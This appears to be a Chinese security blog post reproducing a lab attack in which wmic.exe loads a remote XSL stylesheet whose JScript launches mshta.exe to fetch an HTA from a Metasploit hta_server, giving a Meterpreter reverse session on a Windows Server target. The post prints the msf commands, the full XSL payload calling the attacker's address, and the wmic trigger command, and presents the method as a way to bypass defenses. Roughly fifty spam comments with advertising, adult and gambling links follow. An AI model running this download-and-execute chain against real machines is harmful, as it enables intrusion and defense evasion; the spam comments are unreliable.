利用WMIC执行Payload

亮神说,有wmic可以执行payload,于是就有人复现了一下。
项目地址:https://github.com/Micropoor/Micro8

0x00 WMIC简介(原文复制)

WMIC扩展WMI(Windows Management Instrumentation,Windows管理工具),提供了从命令行接口和批命令脚本执行系统管理的支持。在WMIC出现之前,如果要管理WMI系统,必须使用一些专门的WMI应用,例如SMS,或者使用WMI的脚本编程API,或者使用象CIM Studio之类的工具。如果不熟悉C++之类的编程语言或VBScript之类的脚本语言,或者不掌握WMI名称空间的基本知识,要用WMI管理系统是很困难的。WMIC改变了这种情况。

0x01 原理概述

利用wmic.exe下载远程XSL(EXtensible Stylesheet Language,可扩展样式表语言)文件。其格式类似XML,其中包含一段JScript代码,可以调用WScript.Shell执行命令。

利用WScript.Shell运行mshta.exe,从远程下载hta文件(HTML Application,HTML应用程序)。该文件可以是一段VBScript,可以使用Wscript.Shell来调用powershell来执行Payload。

0x02 环境

攻击机:Kali Linux
IP:10.0.0.16
靶机:Windows Server 2008 Enterprise R2 x64
IP:10.0.0.4

软件:Metasploit Framework、Web服务器(用于下载xsl文件)。

0x03 实验

打开MSF,启动hta server,设置好payload类型和参数:

msf5> use exploit/windows/misc/hta_server
msf5> exploit

复制以下模板XSL文件,修改其中hta文件的地址为上图中的地址即可。我的虚拟机使用了双网卡,使用靶机可访问的10.0.0.16地址。

<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
	<ms:script implements-prefix="user" language="JScript">
	<![CDATA[
	var r = new ActiveXObject("WScript.Shell").Run("mshta.exe http://10.0.0.16:8080/0gLLJrV.hta");
	]]> </ms:script>
</stylesheet>

将XSL文件放在/var/www/html/目录下,启动apache,为靶机提供Payload下载服务。靶机执行以下命令,加载并执行远程Payload:

# wmic.xsl为编辑好的文件
wmic os get format:"http://10.0.0.16/wmic.xsl"

MSF接收到反弹的meterpreter:

wmic.exe为Windows自带管理工具,将PowerShell Payload进行适当的处理后,可以起到神奇的bypass效果。

Tags:

You may also like...

50 Responses

  1. C_S4CDK_2022 questions说道:
    2022年5月28日 下午7:16

    Black Rubber Caster Wheelブランド時計コピーClassy Hydroxypropyl Methyl Cellulose HPMC

    回复
  2. tree removal Carmel IN说道:
    2022年5月30日 下午5:40

    Thank you ever so for you article.Much thanks again. Awesome.

    回复
  3. best mini wand massagers说道:
    2022年6月1日 下午11:10

    I loved your blog post. Fantastic.

    回复
  4. pussy pumping说道:
    2022年6月2日 上午6:37

    I really liked your blog article.Really thank you! Cool.

    回复
  5. Katie说道:
    2022年6月2日 下午12:21

    what do cbd peanut butter bites for dogs do to your dog

    回复
  6. waterproof wand massager说道:
    2022年6月2日 下午11:52

    Great article.Much thanks again. Cool.

    回复
  7. burlington penthouses说道:
    2022年6月4日 下午4:33

    Great blog.Really thank you! Keep writing.

    回复
  8. bondage toys for couples说道:
    2022年6月11日 上午8:40

    I really liked your blog post.Much thanks again.

    回复
  9. techyseva说道:
    2022年6月11日 下午5:42

    Really informative blog post.Really looking forward to read more. Really Great.

    回复
  10. baby bibs australia说道:
    2022年6月21日 下午6:17

    wow, awesome blog post.Really thank you! Awesome.

    回复
  11. see说道:
    2022年6月23日 上午1:50

    I will immediately grab your rss feed as I can not in finding your email subscription hyperlink or newsletter service. Do you’ve any? Please let me understand so that I may just subscribe. Thanks.

    回复
  12. how to make your own dildo说道:
    2022年6月28日 上午6:28

    Very neat post.Really looking forward to read more. Great.

    回复
  13. daftar judi bola说道:
    2022年6月30日 下午7:46

    Looking forward to reading more. Great post.Much thanks again. Great.

    回复
  14. judi bola online说道:
    2022年7月1日 上午1:37

    A round of applause for your article.Much thanks again. Cool.

    回复
  15. Analytics platform说道:
    2022年7月2日 下午6:50

    Muchos Gracias for your post.Thanks Again. Want more.

    回复
  16. mp3juice说道:
    2022年7月3日 上午4:49

    Really informative blog article.Really looking forward to read more. Really Great.

    回复
  17. rap plan说道:
    2022年7月4日 上午6:03

    A big thank you for your blog.Much thanks again. Cool.

    回复
  18. best baby bowls and spoons说道:
    2022年7月5日 下午5:49

    I really liked your blog article.Really thank you! Awesome.

    回复
  19. apkpure说道:
    2022年7月6日 上午8:29

    Very good post.Really looking forward to read more. Really Great.

    回复
  20. Lips说道:
    2022年7月6日 下午6:11

    Appreciate you sharing, great blog post.Much thanks again. Great.

    回复
  21. Juyoyo ring说道:
    2022年7月7日 上午1:11

    Fantastic post.

    回复
  22. viral rose clit vibrator说道:
    2022年7月7日 上午5:57

    Thank you for your article post.Really looking forward to read more. Really Cool.

    回复
  23. crypto说道:
    2022年7月12日 下午6:24

    Really informative post.Really thank you! Keep writing.

    回复
  24. auto detailing kansas city说道:
    2022年7月13日 下午5:47

    Fantastic article post.Really looking forward to read more. Keep writing.

    回复
  25. rpl learning说道:
    2022年7月14日 上午9:02

    Fantastic post.Really thank you! Keep writing.

    回复
  26. precio de madera plastica说道:
    2022年7月22日 下午9:18

    hydroxychloroquine clinical trial chloroquine vs hydroxychloroquine

    回复
  27. roofing说道:
    2022年7月24日 上午7:43

    Great blog. Really Great.

    回复
  28. gadgetofficials.com说道:
    2022年7月30日 上午7:14

    Great blog.Really looking forward to read more. Want more.

    回复
  29. tubidy说道:
    2022年8月3日 下午1:33

    I used to be able to find good advice from your blog posts.

    回复
  30. travel europe说道:
    2022年8月4日 上午12:14

    Say, you got a nice blog article.Thanks Again. Keep writing.

    回复
  31. japandi说道:
    2022年8月4日 下午8:07

    tiktok follower kaufen mit echten followern

    回复
  32. cooe apk说道:
    2022年8月9日 下午4:56

    Fantastic article post.Much thanks again. Keep writing.

    回复
  33. Kelvin Kaemingk说道:
    2022年8月9日 下午10:18

    A big thank you for your blog article.Thanks Again. Want more.

    回复
  34. website design malaysia说道:
    2022年8月12日 下午1:45

    Wow, great article post.Much thanks again. Much obliged.

    回复
  35. look what i found说道:
    2022年8月13日 下午7:47

    מילפית עם ציצי ענק וכוס מושלם נדפקת על הספה בכל התנוחות האפשרויותשירותי ליווי במרכז

    回复
  36. film equipment rental malaysia说道:
    2022年8月14日 上午5:08

    Thanks for finally talking about > シェアリング・エコノミー – Ayaka’s Blog

    回复
  37. blended learning说道:
    2022年8月20日 下午12:39

    Tin Tức, Sự Kiện Liên Quan Lại Đến Trực Tiếp đá Bóng Nữ Giới bet88Đội tuyển nước ta chỉ cần một kết trái hòa có bàn thắng để lần thứ hai góp mặt tại World Cup futsal. Nhưng, nhằm làm được như vậy

    回复
  38. insulated water bottle说道:
    2022年8月30日 下午9:56

    You made your point quite clearly!. canadian pharmacies online

    回复
  39. mas info说道:
    2022年9月2日 下午12:59

    I want to see your book when it comes out.

    回复
  40. download lagu说道:
    2022年9月3日 下午2:11

    Saved as a favorite, I like your blog!

    回复
  41. shawarma in kubwa说道:
    2022年9月4日 上午2:02

    Great info! Keep post great articles.

    回复
  42. Tattoo说道:
    2022年9月6日 下午8:40

    ถ้าหากจะถามถึงเกมออนไลน์ที่เล่นง่ายและทำเงินได้ง่ายที่สุดลุกงหนีไม่พ้นบาคาร่าออนไลน์ UFABET ก็เลยเอาใจสมาชิกโดยการรวมรวมเกมบาคาร่าออนไลน์ไว้เยอะมากเพื่อสามาชิกได้เลือกเล่นอย่างเต็มที่นอกเหนือจากนั้นยังมีเกมฯลฯ

    回复
  43. สเต็ป2说道:
    2022年9月12日 下午12:25

    It’s time for communities to rally.

    回复
  44. 두팔로우说道:
    2022年9月16日 上午12:18

    I love your blog. It looks every informative.

    回复
  45. more details说道:
    2022年9月16日 上午1:01

    Nicely put, Many thanks.best essay service essays writing service custom report writing service

    回复
  46. zaragoza说道:
    2022年9月17日 下午5:46

    You write Formidable articles, keep up good work.

    回复
  47. tejados说道:
    2022年9月17日 下午7:49

    Makes sense to me.

    回复
  48. ukrainiansexchat.com说道:
    2022年9月20日 下午12:25

    Thank you for helping out, great information. «Riches cover a multitude of woes.» by Menander.

    回复
  49. dat phong VIP说道:
    2022年9月22日 下午3:20

    Enjoyed every bit of your blog.Really thank you! Really Great.

    回复
  1. 3intercept
    2022年6月20日

    3temporary

发表回复

您的电子邮箱地址不会被公开。